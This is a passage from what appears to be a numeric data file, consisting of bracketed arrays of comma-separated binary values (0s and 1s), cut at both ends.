1,1,0,1,1,1,1,1,1,0,1,0,1,1,0,1,0,0,1,1,1,1,0,0,0,0,0,0,1,0,1,0,0,0,0,1,1,1,0,1,0,0,0,0,1,1,0,1,1,1,1,1,0,1,0,0,1,0,1,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,1,1,1,0,0,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,1,0,0,1,1,0,1,0,1,1,1,1,1,1,1,0,0,1,1,0,1,0,0,0,1,0,1,0,1,0,1,0,0,0,0,1,0,1,1,1,0,0,0],[0,1,1,0,1,1,0,1,0,0,1,0,1,0,1,0,0,1,1,0,0,0,1,1,0,0,0,1,1,0,1,0,1,0,0,1,1,0,1,1,1,0,1,1,1,0,0,1,1,1,1,1,1,1,0,1,0,0,1,0,0,1,1,0,0,0,0,0,1,0,1,0,1,0,1,1,0,0,0,0,1,1,0,1,0,1,1,1,1,0,0,0,0,1,1,1,0,1,1,1,0,1,0,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,1,1,0,1,1,1,1,0,1,0,0,0,1,1,0,0,0,0,1,1,0,1,1,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,0,0,1,1,0,0,1,0,1,1,0,1,1,1,0,1,1,0,1,1,1,1,1,1,0,1,1,0,0,1,0,1,0,0,0,0,1,1,1],[1,1,1,0,0,1,0,1,1,1,1,0,0,0,0,1,0,0,1,1,1,1,1,0,1,1,1,1,0,1,1,0,0,1,0,1,1,0,1,1,0,0,0,0,0,0,0,0,1,0,1,1,0,0,1,1,1,1,1,1,0,0,0,1,0,1,1,0,1,0,1,0,0,1,1,0,1,0,1,0,0,0,0,0,0,1,0,1,1,1,0,0,1,0,1,1,1,0,0,0,1,0,1,0,0,1,1,0,0,1,1,1,0,0,0,0,0,1,1,0,0,1,1,1,0,
1,0,0,1,1,1,0,1,1,1,1,0,1,1,1,0,0,0,1,1,1,0,1,0,0,1,0,0,1,0,0,1,1,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,0,1,1,1,1,1,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,1,0,0,1,1,0,0,1],[0,1,1,1,0,1,1,0,1,0,1,0,1,0,1,1,1,1,0,1,0,1,0,0,0,1,1,1,0,1,1,1,1,1,0,0,1,0,0,0,0,1,0,1,1,0,0,0,1,1,0,1,0,1,1,0,1,1,0,0,1,1,1,0,0,1,1,0,0,0,1,1,1,1,0,0,0,0,0,1,1,1,0,0,1,0,1,1,0,1,0,0,1,1,0,0,0,1,0,0,1,0,0,0,1,0,0,1,0,0,1,0,0,0,1,1,1,1,1,0,0,1,0,1,0,1,0,1,1,1,0,1,1,1,0,0,1,0,0,1,1,1,0,1,0,1,1,1,1,0,0,1,0,0,0,0,0,0,1,0,1,0,1,1,1,0,0,0,0,1,1,0,0,1,0,1,0,1,1,0,1,1,0,1,1,0,1,0,1,1,0,0,0,0,1,0,0,1,0,1,1,1,0],[1,0,0,1,1,0,1,0,1,1,1,0,0,0,0,0,1,0,1,0,0,1,1,0,0,1,0,0,0,1,0,1,1,0,1,1,0,1,0,1,0,0,1,1,1,0,0,1,0,1,0,1,0,1,0,0,1,0,1,1,0,1,1,1,1,1,1,1,0,1,1,0,1,0,0,0,0,1,0,1,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,1,1,1,1,0,1,0,0,1,0,1,0,1,0,1,1,1,1,0,0,0,1,1,0,1,0,1,1,1,1,1,0,1,1,1,1,0,1,0,1,1,0,1,0,0,0,1,1,1,1,0,0,0,1,1,0,1,1,1,0,0,1,1,1,0,1,1,0,1,0,1,0,1,0,1,0,1,1,0,0,0,0,1,1,1,1,0,1,0,1,1,1,1,0,1,0,0,1,1,0,0],[0,0,0,1,0,0,1,0,0,0,0,0,1,1,1,1,1,0,0,1,0,0,0,1,0,1,0,0,1,1,1,0,0,0,1,0,0,0,0,0,1,1,0,0,0,0,1,1,0,1,0,0,1,0,1,1,1,1,1,0,1,0,0,1,1,1,1,0,0,0,0,1,1,0,1,1,0,1,1,1,1,0,1,0,0,0,1,1,1,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,1,0,1,0,1,0,0,0,1,0,1,0,1,0,1,0,1,0,1,1,0,0,0,0,0,0,1,1,1,1,1,0,0,0,1,1,1,1,1,0,1,1,0,0,0,1,1,1,1,1,1,0,0,0,0,0,1,0,1,0,1,0,1,1,0,1,1,1,0,0,1,1,1,0,0,0,0,0,1,0,0,0,1,1,0,0,1,0,1,1,0],[1,0,0,0,0,0,1,1,0,0,1,1,0,1,0,1,1,1,1,0,0,1,1,1,1,0,0,1,1,0,0,0,1,1,0,0,0,1,1,1,0,0,0,1,0,0,0,0,0,0,1,1,1,0,0,1,0,0,1,1,0,1,1,0,0,0,0,1,1,1,0,0,0,1,1,1,1,0,1,0,0,0,0,1,1,1,0,0,1,0,1,0,0,0,1,1,0,0,0,0,0,1,0,1,1,1,1,1,0,0,1,1,0,0,1,1,0,1,0,0,1,1,0,0,1,0,1,1,1,0,0,1,1,0,1,0,0,1,0,1,1,0,0,1,0,1,1,0,0,1,1,0,1,1,0,0,1,1,0,0,0,0,1,0,1,1,1,1,1,0,1,1,1,0,0,0,1,0,1,1,0,0,0,0,1,0,1,1,0,1,0,1,0,0,1,1,1,1,0,0,1,0,0],[1,0,0,1,0,1,0,1,1,1,1,1,1,1,0,1,0,1,0,0,1,0,1,1,1,1,1,1,1,1,1,0,1,1,0,0,0,0,0,0,1,1,1,0,0,1,0,1,1,1,0,1,1,0,0,1,0,0,0,0,0,1,1,0,0,0,1,0,1,0,0,1,1,1,1,1,0,1,1,1,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,1,0,1,0,0,1,0,0,1,1,
0,0,0,1,1,0,0,1,1,0,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0,1,0,1,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,1,0,1,1,0,0,0,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,0,0,1,0,1,1,0,0,1,1,1,0,1,1,0,1,0,0,0,0,1,1,1,0,1,0,0,1,0,1,0,0,1],[1,0,0,0,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,0,0,1,0,1,0,0,1,0,0,1,0,1,0,1,0,1,0,1,0,1,1,1,0,1,1,1,1,1,1,0,1,1,0,0,0,1,0,0,1,1,1,1,0,0,0,1,1,0,1,1,1,0,1,0,0,1,1,1,0,0,1,0,1,0,1,0,0,1,1,0,1,0,0,1,1,0,1,0,1,1,0,0,1,0,1,0,0,1,0,1,1,1,0,0,0,1,1,0,0,1,1,1,1,1,0,1,1,0,0,0,1,0,1,0,0,1,1,0,1,0,0,0,0,1,1,1,0,1,1,0,0,0,1,0,1,1,0,1,0,0,1,0,0,1,0,0,1,0,1,0,0,0,0,0,0,0,1,0,0,1,1,0,0],[1,0,1,1,0,0,1,0,0,0,1,1,0,1,0,0,1,0,1,0,0,1,1,1,0,0,0,1,1,0,1,1,0,0,0,0,1,0,1,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,1,1,1,0,1,1,1,0,1,0,0,1,1,1,0,1,1,1,1,1,0,1,1,0,1,1,1,0,1,0,1,0,0,0,1,0,0,1,0,0,1,0,0,1,1,1,1,1,0,0,0,1,0,1,0,0,1,1,1,0,0,0,0,1,0,0,1,0,0,0,1,1,0,0,0,1,0,1,1,0,1,1,1,0,1,1,0,1,1,1,1,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,1,1,0,1,1,0,1,0,0,0,1,1,1,1,0,0,0],[1,0,0,1,0,0,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,0,1,0,0,1,0,0,0,1,0,0,1,0,0,0,0,1,1,1,1,1,1,0,0,1,1,0,1,0,0,1,0,1,0,1,0,0,1,0,1,1,0,1,0,1,1,0,0,0,0,0,1,0,0,1,1,0,0,0,1,1,1,0,0,1,0,1,1,1,0,1,0,1,0,0,1,1,1,1,0,0,0,1,1,0,0,0,0,0,0,1,0,1,0,0,0,1,1,1,1,1,0,0,0,1,0,0,1,0,1,1,0,1,1,0,0,0,1,0,1,0,1,0,0,1,1,1,1,1,0,1,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,0,1,0,1,1,1,1,1,0,1,0,1,1,1,0,0,0,0,0,1,0,1,0,1,0,1,1,1,0,0,0,1],[1,0,1,1,1,1,0,0,1,1,1,0,1,1,1,1,1,0,0,0,1,1,1,1,0,1,0,1,0,1,0,1,1,0,1,0,1,0,1,1,0,0,1,0,1,1,0,0,0,1,1,0,0,1,1,0,1,0,1,0,0,1,1,1,1,1,1,1,1,0,1,0,0,0,0,0,1,1,1,0,0,0,0,0,1,0,1,0,0,1,1,0,1,1,0,1,1,0,1,1,0,0,1,0,1,0,0,1,1,0,0,0,1,0,0,1,0,1,0,0,0,0,1,0,1,0,0,1,0,1,1,0,1,0,0,1,1,0,0,0,1,1,1,1,0,1,1,1,0,0,1,1,1,1,0,0,1,1,1,1,0,1,0,0,1,1,0,0,1,1,0,1,0,0,1,0,1,1,0,0,1,1,1,1,0,1,0,1,0,0,1,0,1,1,1,0,0,1,1,1,1,1,1],[1,1,0,0,1,1,1,1,1,1,1,0,1,1,0,0,1,1,1,1,0,1,1,0,0,1,1,0,1,1,0,1,0,1,0,1,0,0,1,1,1,1,1,0,0,0,0,1,0,1,1,0,1,0,1,0,1,1,0,0,0,1,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,1,0,
1,0,0,1,1,1,0,1,0,1,0,0,0,1,1,0,0,1,1,0,1,0,1,0,0,0,0,0,1,1,1,0,1,1,0,1,0,0,1,1,0,0,0,1,1,1,1,1,0,1,1,0,0,0,1,0,0,0,0,0,0,1,0,1,1,1,0,0,0,0,0,0,0,1,1,1,0,0,1,1,1,0,0,1,0,1,1,1,0,1,0,1,1,1,0,0,1,0,1,1,1,1,0,0,1,0,1,0,1,1,1,0,0,1,0,1,0,1],[1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,1,0,0,1,0,1,1,1,1,1,0,0,1,1,1,1,1,1,1,0,1,0,1,1,0,0,1,0,1,1,1,1,1,0,1,0,1,0,1,1,1,1,0,0,1,1,1,1,0,0,0,0,0,1,1,1,1,0,1,0,1,1,1,0,0,0,1,1,1,1,0,0,0,0,0,1,0,1,0,1,1,1,0,1,1,1,0,0,0,1,0,0,1,1,0,0,1,1,0,0,1,0,1,1,1,1,0,0,1,1,0,1,1,1,0,0,0,0,1,0,1,1,0,1,0,0,1,1,1,0,0,1,0,1,1,1,0,1,1,1,1,1,0,1,1,0,0,0,1,0,1,1,0,0,0,1,0,0,1,1,1,1,1,1,0,0,1,0,1,0,1,0,0,0,1,1,0,1,1,1,0,1,1,1,1,1,1],[1,0,0,1,1,1,0,0,0,1,0,0,0,1,0,0,1,0,1,1,0,0,0,1,1,0,0,1,0,1,1,0,0,1,0,0,0,0,1,1,0,1,0,1,0,0,0,0,0,0,1,0,1,0,1,0,0,1,0,1,1,1,1,0,1,1,0,0,1,0,1,0,1,0,1,1,0,0,1,1,1,0,1,0,1,1,0,0,0,0,1,1,0,1,1,1,0,1,0,0,0,0,1,0,0,1,1,0,1,1,0,1,1,1,0,1,0,1,0,1,0,0,1,0,1,1,0,0,0,1,1,0,0,1,1,0,1,1,0,0,0,0,0,0,0,1,0,0,1,1,1,0,1,0,0,0,1,1,0,1,1,1,1,0,1,0,0,1,0,0,0,1,0,0,1,1,1,1,0,1,1,0,1,0,0,1,1,0,1,0,1,0,0,1,0,0,0,0,1,0,1,1,0],[0,1,1,0,0,1,0,1,1,0,0,0,1,0,1,1,1,1,0,0,0,1,1,0,1,1,1,0,1,1,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,1,1,1,1,0,0,0,1,0,1,1,1,0,0,1,1,1,0,0,0,1,0,0,1,1,0,0,1,1,0,0,0,0,0,1,0,0,1,0,1,1,0,1,1,0,0,0,1,1,0,1,0,1,1,1,1,1,1,1,0,1,1,0,1,0,1,1,0,0,1,1,1,1,0,1,1,1,0,0,1,1,1,1,0,1,1,0,1,0,1,1,0,0,0,1,0,1,1,0,1,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,1,0,1,0,0,0,0,1,0,1,1,1,1,1,1,0,1,0,0,0,0,0,1,0,1,0,0,0,0,1,0,1,0,1,0,1,0,0,1,0],[1,1,1,0,1,0,1,0,1,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,1,1,1,0,0,1,1,1,1,0,0,1,1,0,1,0,1,0,0,1,0,0,0,1,1,1,1,0,1,1,1,1,1,0,1,1,1,1,0,1,1,1,0,1,0,1,0,0,1,0,1,0,1,0,1,1,0,0,1,0,1,0,0,1,1,1,0,0,0,1,0,1,0,0,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,1,0,0,0,0,0,0,1,0,1,1,0,1,1,1,0,0,0,0,1,0,1,1,1,0,0,1,1,0,0,1,0,0,0,1,1,1,0,0,0,0,0,0,0,0,1,1,1,0,1,0,0,1,1,1,1,1,0,0,0,0,0,0,0,0,0,1,0,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,1,0,1,0,0,0],[0,0,1,1,0,1,1,0,1,0,0,0,0,0,1,1,0,0,0,0,1,0,1,0,0,0,0,0,1,1,1,1,0,1,1,0,1,1,0,1,0,1,0,1,1,0,1,0,1,0,0,1,1,1,0,0,0,0,1,0,1,0,0,0,0,
1,0,0,1,0,1,1,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,0,1,0,1,1,0,1,0,1,1,0,1,0,0,0,0,0,1,1,1,0,0,0,1,0,0,0,1,1,0,0,0,1,0,1,0,1,0,1,1,0,1,0,0,0,1,1,0,0,1,1,0,1,1,0,0,0,1,0,0,1,0,1,1,1,0,0,0,1,0,0,1,1,0,1,0,0,0,1,1,1,1,0,1,0,0,1,1,0,1,0,0,0,0,1,1,1,1,0,1,0,0,0,0,0,1,1,1,0,0,0,1,1,0,1,1],[1,0,1,0,0,1,0,1,0,1,1,1,1,1,0,0,1,1,1,1,1,0,0,0,0,0,1,0,1,1,1,0,1,0,0,1,0,0,0,0,1,0,1,1,1,1,0,0,1,1,1,1,0,1,1,1,0,0,0,1,0,0,1,0,1,1,0,1,0,1,0,0,0,0,0,0,1,0,0,1,1,1,0,0,0,1,1,1,1,0,1,0,1,0,0,1,0,0,0,1,1,1,1,0,1,0,1,0,1,1,0,1,0,1,0,0,1,0,0,1,0,0,0,0,0,1,1,1,0,1,0,1,0,1,0,0,1,1,1,0,1,1,1,1,1,0,1,0,0,0,1,0,1,1,1,1,1,1,0,1,0,1,0,1,0,0,0,1,1,0,0,0,0,1,1,1,1,1,1,1,0,1,1,0,0,1,1,1,1,0,0,0,0,0,0,1,1,0,0,1,0,1,1],[0,1,1,0,0,0,0,1,1,1,0,0,1,0,0,0,0,1,0,0,1,1,0,0,1,0,1,0,0,1,1,1,1,0,1,0,0,0,1,0,0,1,1,0,0,1,1,0,1,1,1,1,0,1,1,1,1,1,1,0,0,1,1,0,1,0,1,1,0,1,1,0,1,0,1,1,1,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,0,1,1,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,1,0,1,0,0,1,1,1,0,1,0,1,0,0,1,1,1,1,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,1,1,1,0,1,0,1,0,1,0,0,0,1,1,0,1,1,0,1,1,1,1,1,1,0,0,1,1,0,1,0,0,1,0,1,0,1,1,0,1,0,1,0,1,1],[1,0,0,1,0,0,1,0,1,1,0,0,1,0,0,1,1,0,1,1,1,1,0,0,1,0,0,1,1,1,0,1,0,0,1,0,1,1,0,1,0,1,0,1,0,0,1,0,0,1,1,1,1,0,0,0,1,0,0,1,0,1,1,0,0,1,0,1,1,1,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,1,0,1,0,0,1,1,1,1,0,0,1,1,0,1,0,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,1,1,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,0,1,0,0,1,0,1,1,0,1,1,1,0,1,0,0,1,1,0,1,1,0,1,1,0,1,1,0,1,1,0,1,0,1,1,1,0,0,1,0,0,1,1,1,0,0,1,0,0,1,0,0,0,1,1,1,0,1,0,0,1,0,1,1],[0,1,1,1,0,1,1,0,0,0,0,0,1,1,0,0,1,0,0,0,1,1,0,1,0,0,1,0,0,0,1,1,1,1,1,1,1,0,1,1,1,1,0,0,0,0,1,0,0,0,0,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,1,0,0,1,0,1,1,0,1,1,0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,1,1,0,0,0,0,1,1,1,1,1,1,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,0,0,1,1,1,0,0,1,1,1,0,1,0,0,0,1,0,0,1,1,1,0,0,1,0,1,1,0,0,0,0,1,1,0,1,0,0,1,1,0,0,1,0,1,0,0,0,0,0,1,0,1,1,0,1,0,0,0,1,0,0,0,1,1,1,0,1,0,0,1,0,0,0,1,0],[1,0,1,0,0,0,0,0,1,1,1,0,1,0,0,0,1,0,1,1,1,1,0,1,1,1,0,0,0,1,1,0,1,1,1,1,1,1,1,1,0,1,1,0,0,
1,0,1,0,1,0,0,0,0,1,1,1,0,1,1,1,0,0,0,0,1,1,0,1,0,0,0,0,1,1,0,1,0,0,1,1,1,0,0,0,1,1,0,1,0,0,1,1,1,1,1,1,0,0,1,1,1,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,1,0,0,0,1,0,0,1,0,1,1,0,1,1,0,1,0,0,1,1,1,0,0,1,0,1,0,0,0,1,1,1,0,0,1,0,1,1,1,1,1,0,1,0,1,0,1,1,0,0,1,0,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,0,1,1,0,1,1],[0,1,1,1,0,0,1,0,0,0,1,1,0,1,1,1,1,0,1,1,1,0,1,1,0,1,1,1,1,1,0,0,1,0,1,1,1,0,1,0,1,1,1,0,1,0,1,0,0,1,1,0,0,0,0,0,1,0,1,0,1,0,1,0,1,1,1,1,1,1,0,1,1,0,1,1,0,1,0,1,0,1,1,0,0,0,1,1,1,1,1,0,0,0,1,0,0,1,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,1,1,1,0,0,0,0,0,1,1,0,1,0,1,0,1,1,1,1,1,0,1,1,0,0,1,1,0,0,1,0,0,1,0,0,0,0,1,0,0,0,1,1,0,0,0,0,0,1,1,1,0,1,1,1,0,1,0,0,0,1,1,1,0,1,1,1,1,1,1,0,0,0,1,1,0,0,0,0,1,0,1,0,0,0,0,1,1,0,1],[0,0,1,1,1,0,0,0,0,0,1,0,0,1,0,0,0,0,1,0,1,0,0,0,0,1,0,1,0,0,1,1,1,0,0,1,1,0,1,0,0,1,0,0,1,0,0,0,0,1,0,1,1,1,0,1,1,1,0,0,1,0,0,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,1,1,0,0,0,1,1,0,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,0,1,0,1,0,1,1,1,0,1,0,1,1,1,1,0,1,0,0,0,1,1,0,0,0,0,1,1,0,0,0,0,0,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,1,0,0,0,1,1,0,0,1,1,1,0,1,1,1,1,0,1,1,0,0,1,1,1,1,1,1,0,0,1,0,1,1,1,0,1,1,1,0,0,1,1,0,1,1,0,1,1,1],[1,0,1,0,1,0,1,0,0,0,0,1,0,0,0,1,1,0,0,1,0,0,1,1,1,1,1,0,1,1,1,1,0,1,0,0,0,0,1,0,1,1,0,1,0,0,1,0,1,0,0,1,0,0,1,0,1,0,0,1,0,1,0,0,1,1,0,0,1,1,0,0,1,1,1,0,0,0,0,0,1,1,0,1,0,1,1,0,0,0,1,0,0,1,0,1,0,1,1,1,1,0,1,0,0,0,1,1,0,0,0,0,1,1,1,0,1,1,0,0,0,0,1,0,0,1,1,1,0,1,0,0,1,1,0,0,1,0,0,1,1,0,1,1,0,1,1,1,1,0,1,1,0,0,0,1,1,0,0,0,1,1,0,0,1,1,0,1,1,1,0,1,1,0,1,0,1,0,1,0,1,0,1,1,1,1,1,1,0,0,0,1,0,0,1,1,0,1,0,0,1,1,1],[0,0,0,0,0,1,0,1,1,0,0,0,1,1,0,1,0,0,0,0,1,0,0,0,0,1,0,1,1,1,0,0,1,0,1,1,0,0,1,1,0,0,1,0,1,0,0,0,1,0,0,1,0,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,1,1,1,0,0,0,1,0,0,0,0,1,0,0,0,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,1,1,0,1,0,1,0,0,0,0,1,1,1,0,1,1,0,0,0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,1,1,0,1,1,1,1,1,0,0,1,1,1,1,1,0,1,1,0,1,0,0,0,1,1,1,0,1,0,1,0,0,0,1,1,1,1,1,0,1,0,0,0,0,1,0,0,0,0,1,1,1,1,0,1,0,1,0,1,0],[0,1,1,0,1,0,1,0,0,1,0,0,0,1,0,0,0,0,1,1,0,1,1,1,0,
1,0,0,0,1,1,1,0,1,0,0,1,1,0,1,1,0,1,1,1,0,0,0,1,0,1,0,1,0,0,0,1,1,1,0,0,0,1,1,0,0,1,1,1,1,1,0,0,1,1,0,1,0,1,0,0,1,0,0,1,1,0,0,0,0,0,0,0,1,1,1,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,1,1,1,1,0,1,1,1,0,0,0,1,1,1,1,1,1,0,1,1,0,0,1,1,0,0,0,0,0,1,0,0,0,1,1,0,1,0,0,0,1,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,1,0,1,0,1,1,0,1,1,1,1,0,0,1,0,0,0,1,1,1,0,1,1,0,1,1,1,1,1,1,0,1,0],[1,0,1,1,1,0,1,1,0,1,0,0,1,1,0,0,0,1,1,0,0,1,1,0,0,0,0,1,0,1,0,1,0,0,0,0,1,0,1,1,1,0,1,0,1,0,0,0,0,0,0,1,0,0,0,1,1,0,1,0,1,1,1,0,0,1,1,0,1,0,0,1,0,0,1,1,0,1,0,1,0,0,0,1,0,0,0,1,1,1,1,0,1,1,0,1,1,1,1,0,1,0,0,1,1,1,0,0,1,0,0,0,1,0,1,0,0,0,0,1,1,1,1,1,0,1,0,1,1,1,1,1,0,0,1,0,0,0,0,0,1,1,0,1,1,1,0,1,1,0,1,1,1,1,1,0,0,1,1,0,1,1,0,1,0,0,0,0,1,0,1,1,1,1,0,1,1,0,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,1,1,1,1],[0,0,0,0,1,0,0,0,1,1,1,0,0,1,1,0,0,0,1,0,1,0,0,1,0,0,0,0,0,1,1,0,1,1,0,0,1,0,0,0,0,1,1,0,1,0,0,1,1,1,1,1,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,1,1,1,1,0,1,1,1,0,0,0,1,0,0,0,0,1,1,0,1,0,1,1,1,0,0,0,1,1,1,0,0,0,1,1,0,0,1,0,0,0,0,0,1,1,1,0,0,0,0,1,1,0,1,1,0,0,0,0,1,0,0,1,1,0,1,0,1,1,0,1,0,1,1,0,0,1,1,0,1,0,1,1,0,1,0,1,0,0,0,0,1,0,0,0,0,1,1,1,0,1,0,1,1,0,0,1,1,1,0,0,0,1,0,0,0,1,0,1,0,0,0,1,1,1,0,1,0,1,1,0,0,1,1,0,0],[0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,1,1,1,1,0,1,0,0,0,0,0,0,0,1,0,1,1,0,1,1,0,1,0,1,1,0,1,1,1,0,1,0,1,1,0,1,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,0,0,0,1,0,1,1,0,1,0,0,0,1,1,1,1,1,0,1,0,0,0,1,0,0,0,1,1,0,0,0,1,0,0,1,0,1,1,1,1,0,1,0,0,1,0,1,1,1,1,0,1,0,1,1,1,1,1,0,1,0,0,1,0,0,1,1,0,1,1,1,1,0,1,0,1,0,1,1,0,1,0,1,1,1,0,0,0,1,0,0,0,1,1,1,1,0,1,0,0,1,0,1,0,1,1,0,0,1,0,1,1,0,0,1,0,0,0,1,0,1,1,1,0,0,0,0,0,0,0,1,0,0,1,0,1],[1,0,1,0,1,0,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,0,1,1,1,0,1,0,0,1,0,0,0,1,1,1,0,0,0,0,1,1,0,0,1,0,1,1,1,0,1,1,0,0,0,1,0,1,0,1,1,0,1,1,1,1,1,1,1,0,1,0,1,0,1,1,0,1,1,0,0,0,1,0,1,0,0,0,1,0,1,1,1,1,1,1,0,1,0,1,1,1,0,0,0,1,0,1,1,0,0,1,1,1,0,1,0,0,0,1,0,1,0,0,1,1,1,1,0,0,1,1,1,1,1,1,0,0,1,1,1,0,0,0,1,1,1,1,0,0,0,0,0,1,1,1,0,1,1,1,0,1,1,0,1,0,0,1,0,0,1,0,1,1,1,0,1,0,1,0,1,0,1,1,1,0,1,1,1,0,1,0,1,0,1,1,0,0,0,0],[1,1,0,1,0,
0,1,0,0,1,0,0,0,1,1,0,1,0,1,1,1,1,0,1,1,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,1,1,0,1,0,0,1,1,1,0,1,1,1,1,1,0,1,1,1,0,0,1,0,0,1,0,1,1,1,0,0,1,0,1,1,0,0,0,1,1,0,0,1,1,1,1,1,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,1,1,1,1,0,0,1,1,0,0,0,1,0,1,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,1,1,1,1,1,0,1,1,0,0,0,0,1,1,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,1,1,0,1,1,1,0,1,1,0,0,1,1,1,0,0,1,0,1,1,1,1,1,1,0,0,0,1,0,0,1,1,1,0,0,0,0],[0,1,1,0,0,1,1,1,1,0,1,0,1,1,1,1,1,0,1,1,0,1,1,1,1,1,1,1,0,1,0,0,0,0,0,1,0,1,1,1,0,0,0,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,1,0,1,0,0,1,0,0,1,0,1,0,0,0,1,1,1,1,1,1,1,0,1,0,0,0,1,0,0,1,0,1,0,1,0,1,1,1,0,0,1,1,0,1,1,1,1,0,1,0,0,1,0,0,1,0,1,0,1,0,0,1,1,0,0,0,0,1,1,1,0,1,1,1,1,1,0,1,0,0,0,1,1,1,0,0,0,1,1,1,1,0,0,1,0,1,1,0,0,0,1,0,0,1,0,0,1,0,1,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,1,1,0,1,0,0,0,0,1,1,1,1,0,1],[1,0,1,0,0,1,0,1,1,1,1,0,0,0,1,1,0,1,0,0,1,0,1,0,0,1,1,0,0,0,0,1,1,1,0,0,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,1,0,0,0,1,0,1,0,0,0,0,1,1,0,1,0,0,0,0,1,1,1,0,1,0,0,0,0,1,0,0,1,0,0,0,1,0,0,1,0,0,0,1,1,0,1,1,0,1,0,1,1,1,1,0,1,1,1,1,1,1,0,0,1,1,1,0,1,0,0,0,1,0,0,1,1,1,0,1,1,0,0,0,1,1,0,1,1,1,0,0,1,1,1,1,0,1,1,1,0,1,1,0,0,1,0,1,1,1,0,1,0,0,0,1,0,1,1,1,1,1,1,0,1,0,1,1,1,1,0,1,1,1,0,1,1,0,0,1,1,0,1,1,0,0],[0,0,1,1,1,0,0,1,1,0,1,0,1,1,0,0,1,1,0,0,1,0,0,1,0,1,1,0,1,1,0,1,0,0,0,1,0,1,0,1,1,1,1,1,1,1,1,0,0,0,1,0,1,1,0,1,0,1,0,0,0,1,0,1,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,0,1,1,1,0,0,0,0,0,0,0,1,0,1,1,0,1,1,0,0,1,0,0,0,1,1,0,1,1,0,0,0,1,0,1,1,0,0,0,0,1,0,1,0,1,1,0,0,1,0,1,1,0,1,0,1,1,0,0,0,1,0,1,1,0,1,0,0,1,0,0,1,0,0,1,1,0,1,1,1,0,1,1,1,1,1,0,1,1,0,0,0,1,0,0,1,0,1,0,1,1,0,0,0,0,1,0,0,1,0,0,1,1,1,1,0,1,1,0],[1,0,1,1,1,1,1,1,1,0,1,1,0,1,1,1,0,1,0,0,0,0,1,0,0,1,0,0,1,1,0,0,1,0,1,0,1,0,1,0,0,0,1,1,0,0,0,1,0,0,1,0,1,1,1,0,0,0,1,1,1,0,1,1,0,0,0,1,1,0,0,1,1,0,1,1,0,0,0,0,0,1,0,0,1,1,0,1,1,1,1,0,0,0,1,1,1,1,1,1,0,1,1,0,0,1,1,0,0,1,1,1,0,0,1,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,0,0,1,0,1,1,0,1,1,1,0,1,0,1,1,0,1,0,1,0,1,0,1,1,0,0,0,0,0,1,0,1,1,0,1,1,1,1,1,1,1,1,0,0,1,0,0,1,0,1,0,1,1,1,1,0,
